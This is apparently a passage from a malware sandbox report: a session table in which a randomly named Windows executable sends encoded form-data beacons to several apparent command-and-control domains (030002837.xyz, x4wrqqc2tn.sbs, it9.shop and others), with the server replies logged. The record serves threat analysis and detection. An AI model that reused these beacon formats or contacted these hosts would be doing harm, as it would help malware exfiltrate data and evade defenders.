                                                                                      12 | 192.168.2.6 | 58786 | 65.21.196.90 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:43.577182055 CEST | 505 | OUT | GET /zl45/?9jtPKX=n8oXMK/zoXm+9Sf+Cf+3HqD48reH4J6cLbqP6V+sjhkAIyrgNn1URxDPpIGDIxJivz/4HVO+PmZpgKq+kRyFpOwr2F+KRn2bmC2fKgazXZTeNyaA5M+5Xps7rgsZqfJ/BnEswgE=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:44.316797972 CEST | 1196 | IN | HTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:44 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?9jtPKX=n8oXMK/zoXm+9Sf+Cf+3HqD48reH4J6cLbqP6V+sjhkAIyrgNn1URxDPpIGDIxJivz/4HVO+PmZpgKq+kRyFpOwr2F+KRn2bmC2fKgazXZTeNyaA5M+5Xps7rgsZqfJ/BnEswgE=&YDT4P=4xd8DzO
                                                                                      vary: User-Agent
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      13 | 192.168.2.6 | 58787 | 172.217.31.4 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:49.721344948 CEST | 769 | OUT | POST /6a3e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Origin: http://www.x4wrqqc2tn.sbs
                                                                                      Referer: http://www.x4wrqqc2tn.sbs/6a3e/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=Mbxsqf0tc9ZZdv+/Nxbc0bkQJICBE2+Rm2AdGFJcjt0DBRxhHRCA8sY13yIBORTNgO3t4E6kekuO+Z2E3qcFnTV00kEg0yVLk7e8zfaVROxfzALYm73eApIIsQu+/PRvyxnryRNxntcUKhiE/tFJDWUluoeaiUFUaYUKHxBtypKtbv8dj7f00u4ccBN8OWxt+nTJc+iDnxAP


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      14 | 192.168.2.6 | 58788 | 172.217.31.4 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:52.460562944 CEST | 793 | OUT | POST /6a3e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Origin: http://www.x4wrqqc2tn.sbs
                                                                                      Referer: http://www.x4wrqqc2tn.sbs/6a3e/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=Mbxsqf0tc9ZZcOO/PWvc/bkTFoCBOW+Vm2MdGHkRjfADCzZhEQCAvcY18SIEKRTTgOrf4G+kek6O+buE2dIEmDV6sUEiqCVLk7e8zcm/RPZfz1DY3pfdIJIPrQu+7PQmyxm4yQAcnukUKkGE8/9GUmUvx4fLrGNebuhlGnRt14CKT59H/IfXm+YecDVOO2xH8nrJOpukoFlsPGES2IXBZY5CaFYHXK1PYQ==


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      15 | 192.168.2.6 | 58789 | 172.217.31.4 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:55.052644014 CEST | 1806 | OUT | POST /6a3e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Origin: http://www.x4wrqqc2tn.sbs
                                                                                      Referer: http://www.x4wrqqc2tn.sbs/6a3e/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      16 | 192.168.2.6 | 58790 | 172.217.31.4 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:42:57.593101025 CEST | 506 | OUT | GET /6a3e/?9jtPKX=BZZMppAtEsJZC+SCGnDJwYc0a7P3I2XUnV0yTl1cw/B5eiAAMyS7zeU40ykuIimpo83S7m3PRw3Wl4+UmttGxit0iCQT0nNXqtGO1eivbt9K3y3Fy6qkJMw6sxrg0uoowV+p4EU=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      17 | 192.168.2.6 | 58792 | 121.254.178.239 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:24.612797976 CEST | 751 | OUT | POST /ecky/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Origin: http://www.it9.shop
                                                                                      Referer: http://www.it9.shop/ecky/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=J+alP7rYA70dHKnNtc+JQ0hxMfN8vzuTsYLPXscZHPHWaEtjjekBPNtnJLN1evfSYHHyzylNPbh5stTQgCCN1DtNexIu0NIBUMS+P3v4WGzAoksKRH+LE00jirL3Ypwmg6xC4Z5enq5m6bUx+1bJXdzVP8C0i1ecD06WrLJGMP5ooiALhUeiAvBuJHHbBeV5t5vFGV/abdRY
                                                                                      Sep 30, 2024 10:43:25.502182007 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:25 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      18 | 192.168.2.6 | 58793 | 121.254.178.239 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:27.162957907 CEST | 775 | OUT | POST /ecky/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Origin: http://www.it9.shop
                                                                                      Referer: http://www.it9.shop/ecky/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=J+alP7rYA70dHq3Nu9+JBkhyC/N8hTupsYXPXtYzHdzWbgljibEBMNtnGrN8TPfdYH6Pz3NNPbd5ssjQjzCK3TtPLBIs6tIBUMS+P36VWCfAvUwKQm+EH00g1bL3cpwcg6xg4YUznoxm6bEx+kbOMNzXBcDFrUj+OXfxr5crTsBwg0BR9neBS/hsJFfpB+VTv5XFUCz9Up07+toL6CSetX90224+y8tlFg==
                                                                                      Sep 30, 2024 10:43:28.046238899 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:27 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      19 | 192.168.2.6 | 58794 | 121.254.178.239 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:29.707602978 CEST | 1788 | OUT | POST /ecky/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Origin: http://www.it9.shop
                                                                                      Referer: http://www.it9.shop/ecky/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:43:30.623109102 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:30 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      20 | 192.168.2.6 | 58795 | 121.254.178.239 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:32.253868103 CEST | 500 | OUT | GET /ecky/?9jtPKX=E8yFMNT5NJgwX+ypl/nybltVULshlwvllIqWYsZuB87EHRd+pdJnIfFxHoxvfPrOXGrS+SNOBaUo3+/x93yIjDBeJAA65d0dctOoKHWlJneMt2c+UnLgAV484ZeCTpIzlpd+zvA=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:43:33.189517021 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:32 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      21 | 192.168.2.6 | 58796 | 202.87.223.248 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:38.569961071 CEST | 763 | OUT | POST /huyu/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Origin: http://www.18kwatch.com
                                                                                      Referer: http://www.18kwatch.com/huyu/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=3bdQCQDRazJtbEkBXMaSIdDe2eFi+GgLuARiaQ+PQXaTWDKS0iZTCGmwjgwY9Twk7Irouu++3EbplHfxaLKyNAf4N09Ex9L1K1H1OhIml/vTyzbI+V3tNgrW5CWjhigIFYLmeQWgFSVqptMtLummTfUqwiqx49lyPITV7HN3MIE5lrKTBdxQI+rFbWGSz+3oi/uW/ET8IDU/
                                                                                      Sep 30, 2024 10:43:39.463545084 CEST | 426 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:39 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      22 | 192.168.2.6 | 58797 | 202.87.223.248 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:41.118943930 CEST | 787 | OUT | POST /huyu/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Origin: http://www.18kwatch.com
                                                                                      Referer: http://www.18kwatch.com/huyu/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=3bdQCQDRazJtbn8BaPiSP9DdouFiwmgPuHZiaQXUQBqTWmOS1jZTDGmw3wwZzzwV7I3guq2+3A7plFXxb8e1MQf6BU9GsNL1K1H1OhdNl+HTyADI+2viOgrV8yWjligMFYLEeSiKFQ9qpootL8OlcfUsuSqv7MEVOaue10xaQbETt9LJduxzauLHbUegze3Cg/WWtTfbH3xcDHb+Ucf3SZChOgGXNn44ZQ==
                                                                                      Sep 30, 2024 10:43:42.028368950 CEST | 426 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:41 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      23 | 192.168.2.6 | 58798 | 202.87.223.248 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:43.659212112 CEST | 1800 | OUT | POST /huyu/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Origin: http://www.18kwatch.com
                                                                                      Referer: http://www.18kwatch.com/huyu/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:43:44.550617933 CEST | 426 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:44 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      24 | 192.168.2.6 | 58799 | 202.87.223.248 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:46.204901934 CEST | 504 | OUT | GET /huyu/?9jtPKX=6Z1wBk7RYwBPGlswbf+1K+rZouoL6hxCsE01bzPZVmnRPi6w4QFoc0Kr9wwe5SYV2Krnjruyq1yW2kXKM8ywVSDOHER5s93YVzLABz8XusiexAKM+GOGLDXayUXcrjkYWYPbXVo=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:43:47.099808931 CEST | 426 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:46 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      25 | 192.168.2.6 | 58800 | 217.160.0.158 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:52.182126045 CEST | 769 | OUT | POST /ojw7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Origin: http://www.accupower.tech
                                                                                      Referer: http://www.accupower.tech/ojw7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=DcBal4dZeLihcT7kr59FPRgI58w0llaw+KGw2kH54aYFlC/JkuRiNFaHDYxdYoZfNp0ICuS3uG6Iq/i1DNOwuQbZ34ZTGTFQVYza+539tVviIdgbTDqM/zF4Rmw7xRocHXVgQtoDiRzrP+z37BG9tIaWB4JXcucC5LGUOnoym8GSQdTcsgVtW2IyGKMjQ9Zzv0XK1L/hlBU3
                                                                                      Sep 30, 2024 10:43:52.818250895 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:43:52 GMT
                                                                                      Server: Apache
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      26 | 192.168.2.6 | 58801 | 217.160.0.158 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:54.864149094 CEST | 793 | OUT | POST /ojw7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Origin: http://www.accupower.tech
                                                                                      Referer: http://www.accupower.tech/ojw7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 44 63 42 61 6c 34 64 5a 65 4c 69 68 64 7a 72 6b 6e 34 39 46 59 42 67 48 32 63 77 30 73 46 61 30 2b 4b 61 77 32 68 6e 50 34 4d 67 46 6c 67 33 4a 32 62 78 69 4b 46 61 48 62 49 78 63 53 49 5a 55 4e 70 49 41 43 72 71 33 75 47 2b 49 71 37 6d 31 44 38 4f 76 76 41 62 48 38 59 5a 52 46 6a 46 51 56 59 7a 61 2b 34 54 62 74 52 44 69 49 6f 6f 62 54 68 43 50 35 44 46 37 59 47 77 37 36 78 6f 51 48 58 56 57 51 76 4e 4c 69 55 33 72 50 37 66 33 37 51 47 79 32 34 62 38 4c 59 49 51 58 38 35 38 32 61 50 57 41 32 30 68 6d 38 75 77 63 4c 53 47 77 54 56 4f 45 6d 6f 77 47 49 55 52 51 64 5a 5a 74 30 76 4b 6e 63 7a 47 71 31 78 55 6d 4d 4c 4c 55 56 69 2f 39 54 52 57 37 33 69 2b 32 77 45 6a 4e 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=DcBal4dZeLihdzrkn49FYBgH2cw0sFa0+Kaw2hnP4MgFlg3J2bxiKFaHbIxcSIZUNpIACrq3uG+Iq7m1D8OvvAbH8YZRFjFQVYza+4TbtRDiIoobThCP5DF7YGw76xoQHXVWQvNLiU3rP7f37QGy24b8LYIQX8582aPWA20hm8uwcLSGwTVOEmowGIURQdZZt0vKnczGq1xUmMLLUVi/9TRW73i+2wEjNQ==
                                                                                      Sep 30, 2024 10:43:55.482134104 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:43:55 GMT
                                                                                      Server: Apache
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      27 | 192.168.2.6 | 58802 | 217.160.0.158 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:43:57.514091015 CEST | 1806 | OUT | POST /ojw7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Origin: http://www.accupower.tech
